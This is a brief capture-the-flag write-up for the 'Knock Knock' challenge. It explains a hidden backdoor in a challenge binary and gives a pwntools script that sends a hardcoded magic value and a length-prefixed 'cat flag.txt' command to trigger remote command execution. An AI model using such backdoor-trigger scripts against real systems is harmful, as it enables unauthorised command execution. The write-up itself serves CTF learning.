HackTheBox x Synack CTF 2021: Knock Knock
TL;DR
- The binary contains a hidden backdoor command handler.
- A hardcoded magic value unlocks privileged command execution.
- Commands are sent as a length-prefixed payload.
- Sending
cat flag.txt through the backdoor prints the flag.
Video Walkthrough
Solution
backdoor.py
from pwn import *
context.log_level = 'DEBUG'
io = remote('ip', 31337)
cmd = b'command:cat flag.txt'
io.send(b'8f4328c40b1aa9409012c7406129f04b')
io.send(bytes([len(cmd)]))
io.send(cmd)
io.interactive()